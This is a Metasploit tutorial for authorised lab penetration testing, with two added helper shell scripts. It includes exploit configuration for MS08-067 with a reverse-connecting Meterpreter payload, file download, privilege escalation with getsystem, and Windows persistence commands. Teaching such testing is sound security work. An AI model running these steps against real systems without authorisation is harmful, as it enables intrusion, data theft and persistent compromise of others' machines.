Metasploit Tutorial


Introduction

Metasploit is a widely used penetration testing framework that gives security researchers and professionals a single environment in which to scan for vulnerabilities, configure and launch exploit code, and work with compromised hosts afterwards. This guide covers installation, the console, the module types, a basic penetration-testing workflow from reconnaissance to reporting, and a few advanced features.

Prerequisites

  • A system with Kali Linux installed (Metasploit comes pre-installed on Kali Linux).

  • Basic understanding of network protocols, operating systems, and cybersecurity concepts.

  • A target machine you are authorised to attack, on an isolated lab network (e.g. a deliberately vulnerable virtual machine such as Metasploitable 2).

Installing Metasploit

Metasploit is pre-installed on Kali Linux. If it is missing, or you want to update it, use the package manager:

  1. Update and Upgrade Your System:

     sudo apt-get update && sudo apt-get upgrade
    
  2. Install or Update Metasploit Framework:

     sudo apt-get install metasploit-framework
    
  3. Initialise the PostgreSQL database the console uses to store hosts, services, credentials and loot (once):

     sudo msfdb init
    

On distributions that do not package Metasploit, Rapid7 publishes an installer for its nightly builds:

     curl -o msfinstall https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
     chmod 755 msfinstall
     ./msfinstall
    

Do not pipe a downloaded script straight into sudo bash: save it, read it, and only then run it. Note also that msfupdate (a script inside the framework repository) updates an existing installation; it is not an installer.

Starting Metasploit

  1. Open Terminal and start Metasploit:

     msfconsole
    
    • Root is not required for the console itself. Use sudo only for modules or scans that need raw sockets or privileged ports (a SYN scan through db_nmap, for example).

  2. Metasploit Console:

    • Upon starting, you will see the Metasploit banner and the msf6 > prompt (the digit is the framework's major version), indicating that Metasploit is ready for use. Start with msfconsole -q to suppress the banner.

Basic Commands

  • Search: Find exploits, payloads, or auxiliary modules. Keywords narrow the results, e.g. search type:exploit platform:windows smb or search cve:2017-0144.

      search <term>
    
  • Use: Load a specific module.

      use <module_path>
    
  • Info: Print the loaded module's description, targets, references and options.

      info
    
  • Show Options: Display available options for a module (show payloads lists the payloads compatible with it).

      show options
    
  • Set: Set options for the module. setg sets a value globally, so LHOST need not be re-entered for every module.

      set <option_name> <value>
    
  • Run/Exploit: Execute the loaded module. Both words work; exploit is conventional for exploit modules, run for auxiliary and post modules.

      run
    

    or

      exploit
    
  • Back / Sessions: back unloads the current module; sessions -l lists open sessions and sessions -i <id> interacts with one.
    

Metasploit Modules

Metasploit consists of several types of modules:

  1. Exploits:

    • Code that triggers a vulnerability in a target in order to deliver a payload.
    use exploit/<module_path>
  2. Payloads:

    • Code that runs on the target after successful exploitation (a Meterpreter stage or a plain shell, for example). Singles are self-contained; staged payloads send a small stager first and fetch the rest over the connection.
    set payload <payload_name>
  3. Auxiliary:

    • Scanners, fuzzers, sniffers and other modules that do not deliver a payload.
    use auxiliary/<module_path>
  4. Post:

    • Modules run against an existing session: information gathering, credential collection, privilege escalation, persistence.
    use post/<module_path>
  5. Encoders:

    • Transform payload bytes, historically to avoid bad characters (such as null bytes) that an exploit's input cannot contain. They are not a reliable way to evade modern antivirus or EDR.
    use encoder/<encoder_name>
  6. Nops:

    • No-operation instructions used to pad payloads to a required size.
    use nop/<nop_name>

Conducting a Penetration Test with Metasploit

Step 1: Information Gathering

Use Nmap and auxiliary modules to gather information about the target.

  1. Port Scanning with Nmap:

     sudo nmap -sS -A <target_ip>
    
    • Inside msfconsole, db_nmap takes the same arguments and stores the hosts and services it finds in the database, so later modules can take their targets from hosts -R or services -R instead of retyping addresses.

  2. Service Enumeration:

     use auxiliary/scanner/portscan/tcp
     set RHOSTS <target_ip>
     set THREADS 10
     run
    

Step 2: Vulnerability Scanning

Identify vulnerabilities on the target system without exploiting them yet.

  1. Using Vulnerability Check Modules:

     use auxiliary/scanner/smb/smb_ms17_010
     set RHOSTS <target_ip>
     run
    
    • Metasploit has no Nikto module; run Nikto itself (nikto -h <target_ip>) or use the web-focused auxiliary modules such as auxiliary/scanner/http/http_version and auxiliary/scanner/http/dir_scanner.

  2. Using an Exploit Module's check Command:

     use exploit/windows/smb/ms08_067_netapi
     set RHOSTS <target_ip>
     check
    
    • Many exploit modules implement check, which tests for the vulnerability without sending a payload. Read the module's info output to confirm check is supported before relying on it.

Step 3: Exploitation

Use exploits to gain access to the target system.

  1. Search for Exploits:

     search type:exploit platform:windows smb
    
  2. Select and Configure an Exploit:

     use exploit/windows/smb/ms08_067_netapi
     set RHOSTS <target_ip>
     set PAYLOAD windows/meterpreter/reverse_tcp
     set LHOST <your_ip>
     set LPORT 4444
     check
     exploit
    
    • RHOSTS is the current option name (RHOST survives as an alias in older modules). LHOST must be an address the target can route back to; on a multi-homed box pick the interface facing the target. This module targets the SMB service of Windows XP/2003-era hosts; Metasploitable 2 is Linux, so against it choose a module for a service it actually exposes, for example exploit/unix/ftp/vsftpd_234_backdoor.
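The three steps above are usually replayed many times during an engagement, and Metasploit can read them from a resource script (msfconsole -r file.rc). The following shell script is an added example, not part of the original tutorial or of Metasploit itself: it writes Steps 1 to 3 into a resource script, stopping at check so that a human decides whether to type exploit, and lints the result before use. The helper names gen_rc, rc_lint and is_ipv4 and the addresses 10.0.0.5 / 10.0.0.2 are assumptions made for this example; the console commands and module paths it emits are the ones used in the Basic Commands and module sections above.

```shell
#!/usr/bin/env bash
# Added example: turn Steps 1-3 of the tutorial into a repeatable Metasploit
# resource script. gen_rc, rc_lint and is_ipv4 are hypothetical helpers
# written for this page; the msfconsole commands they emit are real.
set -eu

# Accept only a dotted quad so a typo cannot turn into a scan of the wrong net.
is_ipv4() {
  case "$1" in
    *[!0-9.]*|*..*|.*|*.) return 1 ;;
  esac
  old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
  [ "$#" -eq 4 ] || return 1
  for oct in "$@"; do [ "$oct" -le 255 ] || return 1; done
}

# gen_rc TARGET LHOST OUTFILE: write the resource script for one target.
gen_rc() {
  local target=$1 lhost=$2 out=$3
  is_ipv4 "$target" || { echo "gen_rc: bad target address: $target" >&2; return 1; }
  is_ipv4 "$lhost"  || { echo "gen_rc: bad LHOST address: $lhost" >&2; return 1; }
  cat > "$out" <<EOF
# generated by gen_rc; replay with: msfconsole -q -r $out
# Step 1: recon, stored in the database (run 'sudo msfdb init' once first)
workspace -a tutorial
db_nmap -sS -sV -Pn $target
use auxiliary/scanner/portscan/tcp
set RHOSTS $target
set THREADS 10
run
# Step 2: vulnerability checks that never send a payload
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $target
run
# Step 3: stage the exploit but stop at 'check'; a human types 'exploit'
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $target
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
check
EOF
}

# rc_lint FILE: refuse a script that still has <placeholders>, sets no
# RHOSTS, or would fire run/exploit on an exploit module unattended.
rc_lint() {
  if grep -q '<[A-Za-z_]*>' "$1"; then
    echo "rc_lint: unresolved placeholder in $1" >&2; return 1
  fi
  if ! grep -q '^set RHOSTS ' "$1"; then
    echo "rc_lint: no RHOSTS set in $1" >&2; return 1
  fi
  awk '/^use /{mod=$2}
       /^(run|exploit)$/ && mod ~ /^exploit\//{bad=1}
       END{exit bad+0}' "$1" ||
    { echo "rc_lint: an exploit module would fire unattended in $1" >&2; return 1; }
}

if [ "$#" -eq 3 ]; then
  gen_rc "$1" "$2" "$3" && rc_lint "$3" &&
    echo "wrote $3; review it, then run: msfconsole -q -r $3"
else
  echo "usage: $0 TARGET_IP LHOST OUTFILE" >&2
fi
```

Run it as ./gen_rc.sh 10.0.0.5 10.0.0.2 scan.rc, read scan.rc, then start msfconsole -q -r scan.rc; the console finishes on the loaded exploit module with check already executed, so exploit is one deliberate keystroke away rather than something a script fires on its own. The lint step is the part worth copying into any resource-script workflow: it catches copy-pasted <target_ip> placeholders before msfconsole sees them.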

Step 4: Post-Exploitation

Perform tasks after gaining access to the target system.

  1. Meterpreter Session:

    • Upon successful exploitation, Metasploit drops you into a Meterpreter session. Type background to return to the msf6 > prompt and sessions -i <id> to come back to it.
    meterpreter >
  2. Gather Information:

    • Collect information from the target system.
    meterpreter > sysinfo
    meterpreter > getuid
    meterpreter > ipconfig
  3. File System Navigation:

    • Browse the target file system.
    meterpreter > ls
    meterpreter > cd <directory>
    meterpreter > download <file>
  4. Privilege Escalation:

    • Attempt to elevate privileges on the target system.
    meterpreter > getsystem
    • getsystem only works when the session already holds local administrator rights; it uses named-pipe impersonation and token techniques, not a kernel exploit. From a low-privilege session, background it and run post/multi/recon/local_exploit_suggester to list local exploits that match the host.
  5. Maintaining Access:

    • The legacy run persistence Meterpreter script is deprecated and no longer shipped with current releases. Use the persistence module from the msf6 > prompt with the session backgrounded:
    use exploit/windows/local/persistence
    set SESSION <session_id>
    set LHOST <your_ip>
    set LPORT 4444
    exploit
    • Only install persistence if the rules of engagement allow it, record exactly what was placed (the module prints the path of a cleanup resource script), and remove it at the end of the test.

Step 5: Reporting

Document your findings and create a report.

  1. Export What the Database Collected:

    • Metasploit Framework has no built-in report generator (that is a Metasploit Pro feature), but everything a run discovers is in the database. Review it with hosts, services, vulns, creds and loot, and export it for the write-up:
    db_export -f xml findings.xml
  2. Keep a Console Log:

    • spool writes everything printed in the console to a file, which becomes the evidence trail for the report:
    spool /path/to/pentest.log
  3. Manual Documentation:

    • Note down vulnerabilities, exploits used, timestamps, and outcomes, including what was tested and found not vulnerable.
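A spool log is raw console output, so some extraction is needed before it becomes report material. The following shell script is an added example, not part of the original tutorial or of Metasploit: it pulls positive and negative vulnerability results and opened Meterpreter sessions out of a log, then cross-checks that every session came from a host the log also records as vulnerable, which is the kind of consistency check a reviewer applies to a findings table. The sample log lines are constructed for this example to mirror msfconsole's [*], [+] and [-] status prefixes, not captured from a real run, and the helper names (write_sample_log, vulnerable_hosts, not_vulnerable_hosts, sessions_opened, findings_report) are assumptions.

```shell
#!/usr/bin/env bash
# Added example: extract reportable evidence from a saved msfconsole log.
# The helpers below are hypothetical, written for this tutorial; the log
# lines are constructed in the style of msfconsole output, not real captures.
set -eu

# write_sample_log FILE: constructed stand-in for what 'spool FILE' captures.
write_sample_log() {
  cat > "$1" <<'EOF'
[*] Nmap: 445/tcp open  microsoft-ds  Microsoft Windows XP microsoft-ds
[+] 10.0.0.5:445      - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[-] 10.0.0.6:445      - Host does NOT appear vulnerable.
[*] Scanned 2 of 2 hosts (100% complete)
[+] 10.0.0.5:445      - The target is vulnerable.
[*] Started reverse TCP handler on 10.0.0.2:4444
[*] 10.0.0.5:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.0.0.5
[*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.5:1045) at 2024-05-01 10:15:22 +0000
EOF
}

# vulnerable_hosts LOG: unique host:port from positive ([+]) results.
vulnerable_hosts() {
  grep '^\[+\] ' "$1" | grep -i 'vulnerable' | awk '{print $2}' | sort -u
}

# not_vulnerable_hosts LOG: hosts tested and found negative, so the report
# can state coverage, not only hits.
not_vulnerable_hosts() {
  grep '^\[-\] ' "$1" | grep -i 'not .*vulnerable' | awk '{print $2}' | sort -u
}

# sessions_opened LOG: one "<session id> <target ip>" per Meterpreter session.
sessions_opened() {
  sed -n 's/^\[\*\] Meterpreter session \([0-9][0-9]*\) opened ([^>]*-> \([0-9.][0-9.]*\):[0-9]*).*/\1 \2/p' "$1"
}

# findings_report LOG: tab-separated findings table plus a cross-check that
# every session maps back to a recorded vulnerability on the same host.
findings_report() {
  local log=$1
  printf 'FINDING\tEVIDENCE\n'
  vulnerable_hosts "$log"     | while read -r hp; do printf 'vulnerable\t%s\n' "$hp"; done
  not_vulnerable_hosts "$log" | while read -r hp; do printf 'not vulnerable\t%s\n' "$hp"; done
  sessions_opened "$log" | while read -r sid ip; do
    # exact match on the host part of host:port, so 10.0.0.5 does not match 10.0.0.50
    if vulnerable_hosts "$log" | awk -F: -v ip="$ip" '$1==ip{f=1} END{exit !f}'; then
      printf 'session %s\t%s (matches a recorded finding)\n' "$sid" "$ip"
    else
      printf 'session %s\t%s (WARNING: no vulnerability recorded for this host)\n' "$sid" "$ip"
    fi
  done
}

if [ "$#" -eq 1 ]; then
  findings_report "$1"
else
  demo=$(mktemp); write_sample_log "$demo"; findings_report "$demo"; rm -f "$demo"
fi
```

Run it as ./findings.sh pentest.log on a real spool file, or with no arguments to see it work on the constructed sample. The WARNING branch is the useful part: a session against a host with no recorded vulnerability usually means the evidence for that finding was never spooled, and the report should not claim it until it is.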

Advanced Features

Armitage

Armitage is a graphical front-end for Metasploit that visualises hosts and the exploits that apply to them. It is no longer actively maintained and may not be packaged in current Kali releases, so the steps below apply to older installations.

  1. Install Armitage:

     sudo apt-get install armitage
    
  2. Start Armitage (it needs the Metasploit database running, so complete sudo msfdb init first):

     sudo armitage
    
  3. Using Armitage:

    • Provides a visual representation of targets and available exploits. Its Hail Mary option fires every matching exploit at once, which is noisy and rarely appropriate on a real engagement.

Metasploit Pro

Metasploit Pro (commercial) adds automated exploitation, advanced reporting and team collaboration on top of the open-source Framework. The free Metasploit Community edition has been discontinued. Visit Rapid7's website for current editions.

Conclusion

Metasploit is a versatile and powerful tool for penetration testers, security researchers, and ethical hackers. By understanding its modules, commands, and features, you can conduct thorough penetration tests and improve the security posture of your targets. Always ensure you have proper authorization before performing any penetration testing activities.
